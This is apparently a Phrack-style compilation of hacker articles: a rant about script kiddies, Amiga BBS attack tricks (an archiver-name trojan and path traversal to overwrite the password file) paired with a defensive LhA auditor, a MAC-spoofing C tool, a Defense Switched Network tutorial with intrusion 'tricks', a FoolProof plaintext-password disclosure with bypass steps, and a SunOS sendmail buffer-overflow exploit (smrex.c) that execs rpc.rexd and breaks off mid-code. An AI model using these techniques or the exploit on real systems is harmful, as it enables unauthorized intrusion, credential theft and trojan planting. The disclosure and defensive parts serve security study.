In discussions with him later on #Phrack, we weren't surprised to find that he had been apprehended. As things played out, the user clearly felt no crime had been committed: All he did was change a web page. He adamantly protested that he didn't do any damage, he didn't put in any backdoors, he didn't know that root's .rhosts contained four simple bytes: "+ +\n". Clearly this user didn't look very hard in what were apparently his several weeks of attempting to hack the site. Interestingly enough, I haven't seen this user on IRC since about a week after the episode.

There are several morals to this story: Hacking is a felony. Any unauthorized access constitutes hacking. If you do hack something, don't be a moron about it.

It's likely always been this way, but it's only been more recently I've been paying attention, I suspect: The advent of information availability and a rise in the number of people for whom the net has always been "the norm" is producing a class of users who cannot think for themselves. As reliance upon scripted attacks increases, the number of people who personally possess technical knowledge decreases.

Today I was lurking and watching the activity on #Phrack while tending to issues at work. The two largest discussions which come to mind are that SYN flooding cannot be prevented, even using the newest Linux kernel; and what 0x0D means and that, yes, it is interchangeable for 13 in a C program. For the latter, the opposing point of view was presented by "an experienced C programmer." This was actually a civil conversation. People in-the-know were actually a little more crude than necessary, and the groups in need of reeducation admitted faults without needing four reference sources and three IETF standards quoted. It was a good day.

People these days seem generally unwilling to concede that someone else on the Internet has done their homework, has studied the standards, and has an advantage. They consider themselves experienced because they got an unpatched Windows NT to bring up the Blue Screen Of Death remotely using a program published four months ago. They hack web pages and put their names on it. They seem unwilling to read the code given to them to establish exactly what happens when the newest 0-day exploit runs. They do not find the holes. They seem generally more interested in fucking someone over (unaware of potential consequences) than in really solving any sort of technical problem. It's all a race, it's all a game, it's all a matter of who has the newest tools.

I'm writing this now because I'm sick of that. I'm sick of people who think they're smart and are intent on making sure I know it by putting their feet in their mouths. I'm sick of people who persistently ignore advice given to them and get angry when the consequences happen. I'm sick of people who cannot contribute intelligently to a conversation.

So here are some tips for the future:

You're a lot more impressive if you say something right than if you say something wrong. Someone nearby may be able to verify your claim and may call you on it.

You're a lot more impressive if you can do something effortlessly because you've done it before than if you bumble and stumble through an experience because you thought you could do it and were wrong.

If you're caught in a lie, admit it. The people who caught you already know more than you do: If you continue to spout bullshit, they'll know that too. But do your homework. Don't let them catch you being an idiot twice.

If you do something illegal, don't broadcast it. This is especially stupid. Chances are, someone will be looking for someone to blame soon. By announcing that you're responsible, you're inviting them to contact you.
0x2>-------------------------------------------------------------------------

Portable BBS Hacking
Extra tips for Amiga BBS systems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

After reading Khelbin's article from Phrack 50 (article 03), it reminded me of the similar tricks I had learnt for Amiga BBS systems. So I decided to write a small article covering the Amiga specific things. As with Khelbin's article, the actual BBS software isn't particularly important since they mostly all work the same way in the respect of archivers. This trick can also be used on other users, but I'll cover that later in the article.

Firstly, the Amiga supports pathing. This means you can set up paths which point to the directories where your commands are held. The Amiga OS also automatically sets a path to the current directory. As far as I know, you can't stop it doing this, but you don't need to anyway, if you're smart.

This first problem, relating to the pathing of the current directory, is more common than you might expect, since it's such a simple thing to overlook. What happens is this: The BBS receives a new file from you, and unarchives it to a temporary dir for whatever reason. It virus checks the files (or whatever), then it attempts to recompress the files. But, if your file contained an executable named the same as the BBS's archiver, it would call the one you uploaded, since the BBS would've CDed to the temp dir to rearchive the files. As you can imagine, you can use this to activate all sorts of trojans and viruses, as long as the virus checker doesn't recognize them. A good idea is to make sure your trojan calls the proper command as well, so the sysop doesn't notice immediately.

The more observant sysops will have circumvented this problem by calling the archiver with an absolute path, and/or using another method to rearchive the files, without having to CD into the temp dir.

The second trick is very similar to Khelbin's method of hex-editing archives. The only difference is, on the Amiga, the backslash and slash are swapped. For example, you create a file containing a new password file for the BBS in question.

    > makedir temp/BBSData
    > copy MyBBSPasswords.dat temp/BBSData/userdata
    > lha -r a SomeFiles.lha temp

For the makedir, make the "temp" dir name however long it needs to be when you overwrite the characters of it in the hex-editor. In this case, we need 4. Now, load the archive into a hex editor like FileMaster and find the string:

    "temp\BBSData\userdata"

and change it to whatever you need, for example:

    "\\\\BBSData\userdata"

which will unarchive 4 levels back from his temporary directory into the real BBSData dir. The only problem with this is that you need to know a little about the BBS's directory structure. But, if you intend to hack it, you should probably know that much anyway.

You'll notice that within the archive, the slash and backslash are swapped. This is important to remember, since using the wrong one will mean your archive will fail to extract correctly. The article about this from Phrack 50 was for PCs, which use backslash for directory operations. The Amiga uses slash instead, but apart from that, the methods used in that article will work fine for Amiga archives.

If you know the Sysop of the BBS has a program like UnixDirs installed, you can even use the ".." to get to the root dir. The only other way to do that is to use a ":", however, I am not sure if this works. I have a feeling LhA would barf.

Luckily, since the Amiga isn't limited by 8.3 filename problems, you can traverse directories much easier than with the limit imposed on PC systems.

The only real way the Sysop can fix this problem is by having his temp dir for unarchiving be a device which has nothing important on it, like RAM:. That way, if the archive is extracted to RAM: and tries to step back 3 directories using "///", it'll still be in RAM: and won't screw with anything important.
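A sysop-side check for both tricks above, added here as an example and not code from the article: it walks each stored LhA entry name under the Amiga path rules the article describes (backslash as the stored separator, each leading separator one step up, ':' marking a device or assign, '..' acting as a parent step only with UnixDirs) and flags entries that would leave the temp dir or that carry the archiver's own name. The TOOL_NAMES tuple and the sample listing are constructed for the demonstration.

```python
"""Audit Amiga LhA entry names before extracting an upload into a temp dir.

Added example, not code from the article.  Assumed rules, as the article
states them: inside the archive '\\' is the directory separator, each
leading separator steps one level up from the extraction directory, ':'
anywhere marks an absolute device or assign path, and '..' is only a parent
step when a helper like UnixDirs is installed (it is flagged regardless).
"""
from typing import Dict, List, Tuple

SEP = "\\"              # separator as stored in an Amiga LhA archive
TOOL_NAMES = ("lha",)   # constructed: the archiver the BBS re-runs from the temp dir


def walk_entry(stored_name: str) -> Tuple[int, int, List[str]]:
    """Return (final_depth, lowest_depth, components) for one entry.

    Depth is relative to the extraction directory.  An empty component,
    produced by a leading or doubled separator, steps one level up; so does
    '..' on a system with UnixDirs.  A single trailing separator just marks
    a directory entry and is dropped.
    """
    name = stored_name[:-1] if stored_name.endswith(SEP) else stored_name
    parts = name.split(SEP)
    depth = lowest = 0
    for part in parts:
        if part == "" or part == "..":
            depth -= 1
        else:
            depth += 1
        lowest = min(lowest, depth)
    return depth, lowest, parts


def audit_entry(stored_name: str, tools=TOOL_NAMES) -> List[str]:
    """Reasons this entry should not be extracted into a shared temp dir."""
    reasons: List[str] = []
    if ":" in stored_name:
        # A device/assign prefix or bare ':' root ignores the temp dir
        # entirely, so the article's "extract into RAM:" fix does not help
        # here (the article is unsure LhA honours it; flag it anyway).
        reasons.append("absolute path (device or assign)")
    _final, lowest, parts = walk_entry(stored_name)
    if lowest < 0:
        reasons.append(f"escapes extraction dir by {-lowest} level(s)")
    if ".." in parts:
        reasons.append("'..' component (parent step with UnixDirs)")
    base = parts[-1] if parts else ""
    # AmigaDOS file names are case-insensitive, so compare case-folded.
    if base.lower() in {t.lower() for t in tools}:
        reasons.append(f"file named like the archiver '{base}'")
    return reasons


def audit_archive(stored_names: List[str], tools=TOOL_NAMES) -> Dict[str, List[str]]:
    """Map each suspicious entry name to its list of reasons."""
    findings: Dict[str, List[str]] = {}
    for name in stored_names:
        reasons = audit_entry(name, tools)
        if reasons:
            findings[name] = reasons
    return findings


# Constructed listing in the stored (backslash-separated) form.
SAMPLE_LISTING = [
    r"temp\BBSData\userdata",       # what the honest archive looks like
    r"\\\\BBSData\userdata",        # the article's hex-edited variant
    r"Work:BBS\BBSData\userdata",   # device prefix: absolute path
    "lha",                          # shadows the archiver in the temp dir
    r"temp\..\sysop\config",        # only a parent step with UnixDirs
    r"docs\\readme",                # up one from docs, still inside temp
]

if __name__ == "__main__":
    for entry, why in audit_archive(SAMPLE_LISTING).items():
        print(f"{entry!r}: {'; '.join(why)}")
```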
0x3>-------------------------------------------------------------------------

<++> EX/changemac.c
/*
 * In P51-02 someone mentioned Ethernet spoofing.  Here you go.
 * This tiny program can be used to trick some smart / switching hubs.
 *
 * AWL production: (General Public License v2)
 *
 * changemac version 1.0 (2.20.1998)
 *
 * changemac -- change MAC address of your ethernet card.
 *
 * changemac [-l] | [-d number ] [ -r | -a address ]
 *
 *   -d number   number of ethernet device, 0 for eth0, 1 for eth1 ...
 *               if the -d option is not specified the default value is 0 (eth0)
 *
 *   -h          help for changemac command
 *
 *   -a address  address format is xx:xx:xx:xx:xx:xx
 *
 *   -r          set random MAC address for ethernet card
 *
 *   -l          list first three MAC bytes of known ethernet vendors
 *               (this list is not complete, anyone who knows some more
 *               information about MAC addresses can mail me)
 *
 * changemac does not change the hardware address, it just changes data in
 * the structure of the kernel driver for your card.  The next boot of your
 * computer will read the real MAC from your hardware.
 *
 * The changed MAC stays as long as your box is running (or until the next
 * successful changemac).
 *
 * It will not work if the kernel is already using that ethernet device.  In
 * that case you have to turn off that device (ifconfig eth0 down).
 *
 * I use changemac in /etc/rc.d/rc.inet1 (slackware, or redhat) just the line
 * before ifconfig for the ethernet device (/sbin/ifconfig eth0 ...)
 *
 * The author will be very pleased if you can learn something from this code.
 *
 * Updates of this code can be found on:
 *   http://galeb.etf.bg.ac.yu/~azdaja/changemac.html
 *
 * Suggestions and comments can be sent to the author:
 *   Milos Prodanovic
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>

struct LIST {
    char name[50];
    u_char mac[3];
};

/*
 * This list was obtained from vyncke@csl.sni.be, created on 01.7.93.
 */
struct LIST vendors[] = {
    {"OS/9 Network",                          {0x00, 0x00, 0x00}},
    {"BBN",                                   {0x00, 0x00, 0x02}},
    {"Cisco",                                 {0x00, 0x00, 0x0C}},
    {"Fujitsu",                               {0x00, 0x00, 0x0E}},
    {"NeXT",                                  {0x00, 0x00, 0x0F}},
    {"Sytek/Hughes LAN Systems",              {0x00, 0x00, 0x10}},
    {"Tektronics",                            {0x00, 0x00, 0x11}},
    {"Datapoint",                             {0x00, 0x00, 0x15}},
    {"Webster",                               {0x00, 0x00, 0x18}},
    {"AMD ?",                                 {0x00, 0x00, 0x1A}},
    {"Novell/Eagle Technology",               {0x00, 0x00, 0x1B}},
    {"Cabletron",                             {0x00, 0x00, 0x1D}},
    {"Data Industrier AB",                    {0x00, 0x00, 0x20}},
    {"SC&C",                                  {0x00, 0x00, 0x21}},
    {"Visual Technology",                     {0x00, 0x00, 0x22}},
    {"ABB",                                   {0x00, 0x00, 0x23}},
    {"IMC",                                   {0x00, 0x00, 0x29}},
    {"TRW",                                   {0x00, 0x00, 0x2A}},
    {"Auspex",                                {0x00, 0x00, 0x3C}},
    {"ATT",                                   {0x00, 0x00, 0x3D}},
    {"Castelle",                              {0x00, 0x00, 0x44}},
    {"Bunker Ramo",                           {0x00, 0x00, 0x46}},
    {"Apricot",                               {0x00, 0x00, 0x49}},
    {"APT",                                   {0x00, 0x00, 0x4B}},
    {"Logicraft",                             {0x00, 0x00, 0x4F}},
    {"Hob Electronic",                        {0x00, 0x00, 0x51}},
    {"ODS",                                   {0x00, 0x00, 0x52}},
    {"AT&T",                                  {0x00, 0x00, 0x55}},
    {"SK/Xerox",                              {0x00, 0x00, 0x5A}},
    {"RCE",                                   {0x00, 0x00, 0x5D}},
    {"IANA",                                  {0x00, 0x00, 0x5E}},
    {"Gateway",                               {0x00, 0x00, 0x61}},
    {"Honeywell",                             {0x00, 0x00, 0x62}},
    {"Network General",                       {0x00, 0x00, 0x65}},
    {"Silicon Graphics",                      {0x00, 0x00, 0x69}},
    {"MIPS",                                  {0x00, 0x00, 0x6B}},
    {"Madge",                                 {0x00, 0x00, 0x6F}},
    {"Artisoft",                              {0x00, 0x00, 0x6E}},
    {"MIPS/Interphase",                       {0x00, 0x00, 0x77}},
    {"Labtam",                                {0x00, 0x00, 0x78}},
    {"Ardent",                                {0x00, 0x00, 0x7A}},
    {"Research Machines",                     {0x00, 0x00, 0x7B}},
    {"Cray Research/Harris",                  {0x00, 0x00, 0x7D}},
    {"Linotronic",                            {0x00, 0x00, 0x7F}},
    {"Dowty Network Services",                {0x00, 0x00, 0x80}},
    {"Synoptics",                             {0x00, 0x00, 0x81}},
    {"Aquila",                                {0x00, 0x00, 0x84}},
    {"Gateway",                               {0x00, 0x00, 0x86}},
    {"Cayman Systems",                        {0x00, 0x00, 0x89}},
    {"Datahouse Information Systems",         {0x00, 0x00, 0x8A}},
    {"Jupiter ? Solbourne",                   {0x00, 0x00, 0x8E}},
    {"Proteon",                               {0x00, 0x00, 0x93}},
    {"Asante",                                {0x00, 0x00, 0x94}},
    {"Sony/Tektronics",                       {0x00, 0x00, 0x95}},
    {"Epoch",                                 {0x00, 0x00, 0x97}},
    {"CrossCom",                              {0x00, 0x00, 0x98}},
    {"Ameristar Technology",                  {0x00, 0x00, 0x9F}},
    {"Sanyo Electronics",                     {0x00, 0x00, 0xA0}},
    {"Wellfleet",                             {0x00, 0x00, 0xA2}},
    {"NAT",                                   {0x00, 0x00, 0xA3}},
    {"Acorn",                                 {0x00, 0x00, 0xA4}},
    {"Compatible Systems Corporation",        {0x00, 0x00, 0xA5}},
    {"Network General",                       {0x00, 0x00, 0xA6}},
    {"NCD",                                   {0x00, 0x00, 0xA7}},
    {"Stratus",                               {0x00, 0x00, 0xA8}},
    {"Network Systems",                       {0x00, 0x00, 0xA9}},
    {"Xerox",                                 {0x00, 0x00, 0xAA}},
    {"Western Digital/SMC",                   {0x00, 0x00, 0xC0}},
    {"Eon Systems (HP)",                      {0x00, 0x00, 0xC6}},
    {"Altos",                                 {0x00, 0x00, 0xC8}},
    {"Emulex",                                {0x00, 0x00, 0xC9}},
    {"Dartmouth College",                     {0x00, 0x00, 0xD7}},
    {"3Com ? Novell ? [PS/2]",                {0x00, 0x00, 0xD8}},
    {"Gould",                                 {0x00, 0x00, 0xDD}},
    {"Unigraph",                              {0x00, 0x00, 0xDE}},
    {"Acer Counterpoint",                     {0x00, 0x00, 0xE2}},
    {"Atlantec",                              {0x00, 0x00, 0xEF}},
    {"High Level Hardware (Orion, UK)",       {0x00, 0x00, 0xFD}},
    {"BBN",                                   {0x00, 0x01, 0x02}},
    {"Kabel",                                 {0x00, 0x17, 0x00}},
    {"Xylogics, Inc.-Annex terminal servers", {0x00, 0x08, 0x2D}},
    {"Frontier Software Development",         {0x00, 0x08, 0x8C}},
    {"Intel",                                 {0x00, 0xAA, 0x00}},
    {"Ungermann-Bass",                        {0x00, 0xDD, 0x00}},
    {"Ungermann-Bass",                        {0x00, 0xDD, 0x01}},
    {"MICOM/Interlan [Unibus, Qbus, Apollo]", {0x02, 0x07, 0x01}},
    {"Satelcom MegaPac",                      {0x02, 0x60, 0x86}},
    {"3Com [IBM PC, Imagen, Valid, Cisco]",   {0x02, 0x60, 0x8C}},
    {"CMC [Masscomp, SGI, Prime EXL]",        {0x02, 0xCF, 0x1F}},
    {"3Com (ex Bridge)",                      {0x08, 0x00, 0x02}},
    {"Symbolics",                             {0x08, 0x00, 0x05}},
    {"Siemens Nixdorf",                       {0x08, 0x00, 0x06}},
    {"Apple",                                 {0x08, 0x00, 0x07}},
    {"HP",                                    {0x08, 0x00, 0x09}},
    {"Nestar Systems",                        {0x08, 0x00, 0x0A}},
    {"Unisys",                                {0x08, 0x00, 0x0B}},
    {"AT&T",                                  {0x08, 0x00, 0x10}},
    {"Tektronics",                            {0x08, 0x00, 0x11}},
    {"Excelan",                               {0x08, 0x00, 0x14}},
    {"NSC",                                   {0x08, 0x00, 0x17}},
    {"Data General",                          {0x08, 0x00, 0x1A}},
    {"Data General",                          {0x08, 0x00, 0x1B}},
    {"Apollo",                                {0x08, 0x00, 0x1E}},
    {"Sun",                                   {0x08, 0x00, 0x20}},
    {"Norsk Data",                            {0x08, 0x00, 0x26}},
    {"DEC",                                   {0x08, 0x00, 0x2B}},
    {"Bull",                                  {0x08, 0x00, 0x38}},
    {"Spider",                                {0x08, 0x00, 0x39}},
    {"Sony",                                  {0x08, 0x00, 0x46}},
    {"BICC",                                  {0x08, 0x00, 0x4E}},
    {"IBM",                                   {0x08, 0x00, 0x5A}},
    {"Silicon Graphics",                      {0x08, 0x00, 0x69}},
    {"Excelan",                               {0x08, 0x00, 0x6E}},
    {"Vitalink",                              {0x08, 0x00, 0x7C}},
    {"XIOS",                                  {0x08, 0x00, 0x80}},
    {"Imagen",                                {0x80, 0x00, 0x86}},
    {"Xyplex",                                {0x80, 0x00, 0x87}},
    {"Kinetics",                              {0x80, 0x00, 0x89}},
    {"Pyramid",                               {0x80, 0x00, 0x8B}},
    {"Retix",                                 {0x80, 0x00, 0x90}},
    {"",                                      {0x00, 0x00, 0x00}}  /* terminator */
};

void change_MAC(u_char *, int);
void list(void);
void random_mac(u_char *);
void help(void);
void addr_scan(char *, u_char *);

int main(int argc, char **argv)
{
    int c;
    u_char mac[6] = {0, 0, 0, 0, 0, 0};
    int nr = 0, eth_num = 0, nr2 = 0;

    if (argc == 1) {
        printf("for help: changemac -h\n");
        exit(1);
    }

    /* getopt() returns int and signals the end of options with -1 */
    while ((c = getopt(argc, argv, "hla:rd:")) != -1) {
        switch (c) {
        case 'l':
            list();
            exit(0);
        case 'r':
            nr++;
            random_mac(mac);
            break;
        case 'a':
            nr++;
            addr_scan(optarg, mac);
            break;
        case 'd':
            nr2++;
            eth_num = atoi(optarg);
            break;
        case 'h':
            help();
            exit(0);
        default:
            help();
            exit(1);
        }
        if (nr2 > 1 || nr > 1) {
            printf("too many options\n");
            exit(1);
        }
    }

    /* without -r or -a we would program an all-zero address */
    if (nr == 0) {
        help();
        exit(1);
    }

    change_MAC(mac, eth_num);
    return 0;
}

void change_MAC(u_char *p, int ether)
{
    struct ifreq devea;
    int s, i;

    s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) {
        perror("socket");
        exit(1);
    }

    memset(&devea, 0, sizeof(devea));
    snprintf(devea.ifr_name, IFNAMSIZ, "eth%d", ether);

    if (ioctl(s, SIOCGIFHWADDR, &devea) < 0) {
        perror(devea.ifr_name);
        exit(1);
    }

    printf("Current MAC is\t");
    for (i = 0; i < 6; i++)
        printf("%2.2x ", i[devea.ifr_hwaddr.sa_data] & 0xff);
    printf("\n");

    /* an ANSI C ?? --> just testing your compiler */
    for (i = 0; i < 6; i++)
        i[devea.ifr_hwaddr.sa_data] = i[p];

    printf("Changing MAC to\t");
    /* right here i am showing how interesting programming in C is */
    printf("%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x\n",
           0[p], 1[p], 2[p], 3[p], 4[p], 5[p]);

    if (ioctl(s, SIOCSIFHWADDR, &devea) < 0) {
        printf("Unable to change MAC -- is the eth%d device up?\n", ether);
        perror(devea.ifr_name);
        exit(1);
    }
    printf("MAC changed\n");

    /* just to be sure ... */
    if (ioctl(s, SIOCGIFHWADDR, &devea) < 0) {
        perror(devea.ifr_name);
        exit(1);
    }
    printf("Current MAC is: ");
    for (i = 0; i < 6; i++)
        printf("%2.2x ", i[devea.ifr_hwaddr.sa_data] & 0xff);
    printf("\n");

    close(s);
}

void list(void)
{
    int i = 0;
    struct LIST *ptr;

    printf("\nNumber\t MAC addr \t vendor\n");
    /* the list ends at the entry with the empty name */
    while (vendors[i].name[0]) {
        ptr = vendors + i;
        printf("%d\t=> %2.2x:%2.2x:%2.2x \t%s \n", i++,
               0[ptr->mac], 1[ptr->mac], 2[ptr->mac], ptr->name);
        if (!(i % 15)) {
            printf("\n press enter to continue\n");
            getchar();
        }
    }
}

void random_mac(u_char *p)
{
    int i;

    srandom(getpid());
    for (i = 0; i < 6; i++)
        i[p] = random() % 256;
    /* clear the multicast bit and set the locally administered bit so the
       result is a valid unicast address rather than a group address */
    0[p] = (0[p] & 0xfe) | 0x02;
}

void addr_scan(char *arg, u_char *mac)
{
    int i;

    /* check the length first so a short argument is never read past its end */
    if (!(strlen(arg) == 17 && 2[arg] == ':' && 5[arg] == ':' &&
          8[arg] == ':' && 11[arg] == ':' && 14[arg] == ':')) {
        printf("address is not in the specified format\n");
        exit(1);
    }
    for (i = 0; i < 6; i++)
        i[mac] = (u_char)(strtoul(arg + i * 3, 0, 16) & 0xff);
}

void help(void)
{
    printf(" changemac - soft change MAC address of your ethernet card\n");
    printf(" changemac -l | [-d number ] [ -r | -a address ]\n");
    printf(" before you try to use it just turn the ethernet card off: ifconfig ethX down\n");
    printf(" -d number   number of ethernet device\n");
    printf(" -h          this help\n");
    printf(" -a address  address format is xx:xx:xx:xx:xx:xx\n");
    printf(" -r          set random generated address\n");
    printf(" -l          list first three MAC bytes of known ethernet vendors\n");
    printf(" example: changemac -d 1 -a 12:34:56:78:9a:bc\n");
}
/* EOF */
<-->

0x4>-------------------------------------------------------------------------

The Defense Switched Network

By: DataStorm

This is an extremely shortened tutorial on the DSN. More information is available through the DoD themselves and various places on the Internet. If you have any comments or suggestions, feel free to e-mail me.

***THE BASICS OF THE DSN***

Despite popular belief, the AUTOVON is gone, and a new DCS communication standard is in place, the DSN, or Defense Switched Network. The DSN is used for the communication of data and voice between various DoD installations in six world theaters: Canada, the Caribbean, the Continental United States (CONUS), Europe, the Pacific and Alaska, and Southwest Asia. The DSN is used for everything from video-teleconferencing, secure and insecure data and voice, and any other form of communication that can be transmitted over wiring. It is made up of the old AUTOVON system, the European telephone system, the Japanese and Korean telephone upgrades, the Oahu system, the DCTN, the DRSN, the Video Teleconferencing Network, and more. This makes the DSN incredibly large, which in turn makes it very useful. (See the section TRICKS in this article for more information.)

The DSN is extremely isolated. It is designed to function even when outside communication lines have been destroyed and is not dependent on any outside equipment. It uses its own switching equipment, lines, phones, and other components. It has very little link to the outside world, since in a bombing/war, civilian telephone may be destroyed. This aspect, of course, also means that all regulation of the DSN is done by the government itself. When you enter the DSN network, you are messing with the big boys.

To place a call to someone in the DSN, you must first dial the DSN access number, which lets you into the network itself.
From there you can dial any number within the DSN, as long as it is not restricted from your calling area or hone. (Numbers both inside and outside the DSN can be restricted from calling certain numbers). If you are part of the DSN, you may periodically get a call from an operator, wanting to connect you with another person in or out of the network. To accept, you must tell her your name and local base telephone extension, your precedence, and any other information the operator feels she must have from you at that time. (I'm not sure of the operators abilities or technologies. They may have ANI in all or some areas.) The DSN uses signaling techniques similar to Bell, with a few differences. The dial tone is the same on both networks; the network is open and ready. When you call or are being called, a DSN phone will ring just like a Bell phone, with one difference. If the phone rings at a fairly normal rate, the call is of average precedence, or "Routine." If the ringing is fast, it is of higher precedence and importance. A busy signal indicates that the line is either busy, or DSN equipment is busy. Occasionally you may hear a tone called the "preempt" tone, which indicates that your call was booted off because one of higher precedence needed the line you were connected with. If you pick up the phone and hear an odd fluctuating tone, this means that a conference call is being conducted and you are to be included. As on many other large networks, the DSN uses different user classes to distinguish who is better than who, who gets precedence and more calls and who does not. The most powerful user class is the "Special C2" user. This fortunate military employee (or hacker?) has virtually unrestricted access to the system. The Special C2 user identifies himself as that through a validation process. The next class of user is the regular "C2" user. 
To qualify, you must have the requirements for C2 communications, but do not have to meet the requirements for the Special C2 user advantages. (These are users who coordinate military operations, forces, and important orders.) The last type of user is insensitively called the "Other User." This user has no need for Specail C2 or C2 communications, so he is not given them. A good comparison would be "root" for Special C2, "bin" for C2, and "guest" for other. The network is fairly secure and technologically advanced. Secure voice is encrypted with the STU-III. This is the third generation in a line of devices used to make encrypted voice, which is NOT considered data over the DSN. Networking through the DSN is done with regular IP version 4, unless classified, in which case Secret IP Routing Network(SIPRNET) protocol is used. Teleconferencing can be set up by the installation operator, and video teleconferencing is a common occurrence. The DSN is better than the old AUTOVON system in speed and quality, which allows it to take more advantage of these technologies. I'm sure that as we progress into faster transmission rates and higher technology, we will begin to see the DSN use more and more of what we see the good guys using on television. Precedence on the DSN fits the standard NCS requirements, so I will not talk about it in great detail in this article. All I think I have to clear up is that DSN phones do NOT use A, B, C, and D buttons as the phones in the AUTOVON did for precedence. Precedence is done completely with standard DTMF for efficiency. A DSN telephone directory is not distributed to the outside, mainly because of the cost and lack of interest. However, I have listed the NPA's for the different theaters. Notice that the DSN only covers major ally areas. You won't be able to connect to Russia with this system, sorry. Keep in mind that each base has their own operator, who for the intra-DSN circuit, is reachable by dialing "0." 
Here is a word of advice: there ARE people who sit around all day and monitor these lines. Further, you can be assured these are specialized teams that work special projects at the echelons above reality. This means that if you do something dumb on the DSN from a location they can trace back to you, you WILL be imprisoned.

    AREA             DSN NPA
    Canada           312
    CONUS            312
    Caribbean        313
    Europe           314
    Pacific/Alaska   315/317
    S.W. Asia        318

The format for a DSN number is NPA-XXX-YYYY, where XXX is the installation prefix (each installation has at least one of its own) and YYYY is the unique number assigned to each internal pair, which eventually leads to a phone. I'm not even going to bother with a list of numbers; there are just too many. Check http://www.tfs.net/~havok (my home page) for the official DSN directory and more information.

DSN physical equipment is maintained and operated by a team of military specialists designated specifically for this task (you won't see many Bell trucks around DSN areas). Through even my deepest research, I was unable to find any technical specifications on the hardware of the actual switch, although I suppose they run a commercial brand such as ESS 5. My resources were obscure in this area, to say the least.

***TRICKS***

Just like any other system in existence, the DSN has security holes and toys we all can have fun with. Here are a few. (If you find any more, drop me an e-mail.)

* Operators are located on different pairs in each base; one can never tell before dialing exactly who is behind the other line. My best luck has been with XXX-0110 and XXX-0000.

* To get their number in the DSN directory, DoD installations write to:

      HQ DISA, Code D322
      11440 Isaac Newton Square
      Reston, VA 20190-5006

* Another interesting address: it seems that

      GTE Government Systems Corporation
      Information Systems Division
      15000 Conference Center Drive
      Chantilly, VA 22021-3808

  has quite a bit of involvement with the DSN and its documentation projects.
***IN CONCLUSION***

As the DSN grows, so does my fascination with the system. Watch for more articles about it. I would like to say a BIG thanks to someone who wishes to remain unknown, a special English teacher, and the DoD for making their information easy to get a hold of.

0x5>-------------------------------------------------------------------------

Howdy,

I have found a weakness in the password implementation of FoolProof. FoolProof is a software package used to secure workstations and LAN client machines from DoS and other lame-ass attacks by protecting system files (autoexec.bat, config.sys, system registry) and blocking access to specified commands and control panels. FoolProof was written by SmartStuff Software, originally for the Macintosh but recently released for Win3.x and Win95. All my information pertains directly to versions 3.0 and 3.3 of both the 3.x and 95 versions but should be good for all earlier versions if they exist.

I have spent some time playing with it. It is capable of modifying the boot sequence on Win3.x machines to block the use of hot keys and prevent users from breaking out of autoexec. It also modifies the behavior of command.com so that commands can be verified against a database and anything deemed unnecessary or potentially malicious can be blocked (fdisk, format, dosshell?, dir, erase, del, defrag, chkdsk, undelete, debug, etc.). Its Windows clients provide a way to log into/out of FoolProof for privileged access by using a password or hot key assignment. The newer installations on 95 machines have a centralized configuration database that lives on our NetWare server.

My first success with breaking FoolProof passwords came by using a hex editor to scan the Windows swap file for anything that might be of interest. In the swap file I found the password in plain text. I was surprised but thought that it was something that would be simply unavoidable and unpredictable.
Later though I used a memory editor on the machine (95 loves it when I do that) and found that FoolProof stores a copy of the user password IN PLAIN TEXT inside its TSR's memory space. To find a FoolProof password, simply search through conventional memory for the string "FOOLPROO" (I don't know what they did with that last "F") and the next 128 bytes or so should contain two plaintext passwords followed by the hot-key assignment. For some reason FoolProof keeps two passwords on the machine, the present one and a 'legacy' password (the one you used before you _thought_ it was changed). There exist a few memory viewers/editors but it isn't much effort to write something.

Getting to a point where you can execute something can be difficult but isn't impossible. I found that it is more difficult to do this on the Win3.x machines because FoolProof isn't compromised by the operating system it sits on top of; basically getting a DOS prompt is up to you (try File Manager if you can). 95 is easier because it is very simple to convince 95 that it should start up into Safe Mode, then create a shortcut in the StartUp group to your editor and reboot the machine (FoolProof doesn't get a chance to load in Safe Mode).

I tried to talk to someone at SmartStuff but they don't seem to care what trouble their simple-minded users might get into. They told me I must be wrong because they use 128-bit encryption on the disk. Apparently they don't even know how their own software works, because the utility they provide to recover lost passwords requires some 32+ character master password that is hardwired into each installation.

JohnWayne

0x6>-------------------------------------------------------------------------

[ old skool dept. ]

<++> EX/smrex.c
/*
 * Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd.
 * If you don't know what to do from there, kill yourself.
 * Remote stack pointer is guessed, the offset from it to the code is 188.
 *
 * Use: smrex buffersize padding | nc hostname 25
 *
 * where `padding` is a small integer, 1 works on my sparc 1+
 *
 * I use smrex 84 1, play with the numbers and see what happens. The core
 * gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and
 * see where your offsets went wrong :)
 *
 * I don't *think* this is the 8lgm syslog() overflow - see how many versions
 * of sendmail this has carried over into and let me know. Or don't, I
 * wouldn't :)
 *
 * P.S. I'm *sure* there are cleverer ways of doing this overflow. So sue
 * me, I'm new to this overflow business..in my day everyone ran YPSERV and
 * things were far simpler... :)
 *
 * The Army of the Twelve Monkeys in '98 - still free, still kicking arse.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    /* 32-bit SPARC instruction words, written out as one byte string by the
     * final printf. Keep the element 4 bytes wide: an 8-byte type would put
     * NUL bytes into the stream. Build on a big-endian host, as the author
     * did, so the words are emitted in SPARC byte order. */
    unsigned int large_string[10000];
    int i, prelude, npad;
    unsigned long offset;
    char padding[50];

    offset = 188;   /* Magic numbers (see header comment) */
    (void)offset;

    /* Check the argument count before touching argv[1] and argv[2]. */
    if (argc < 3) {
        fprintf(stderr, "Usage: %s bufsize padding | nc target 25\n", argv[0]);
        exit(1);
    }

    prelude = atoi(argv[1]);    /* words of filler before the saved frame */
    npad = atoi(argv[2]);       /* bytes of 'A' to shift the alignment */
    if (prelude < 0 || prelude + 89 > 10000 || npad < 0 || npad > 49) {
        fprintf(stderr, "bufsize/padding out of range\n");
        exit(1);
    }

    /* strcat() needs a NUL-terminated buffer to start from. */
    memset(padding, 0, sizeof(padding));
    for (i = 0; i < npad; i++)
        strcat(padding, "A");

    for (i = 0; i < prelude; i++)
        large_string[i] = 0xfffffff0;       /* Illegal instruction */

    large_string[prelude]     = 0xf7ffef50; /* Arbitrary overwrite of %fp */
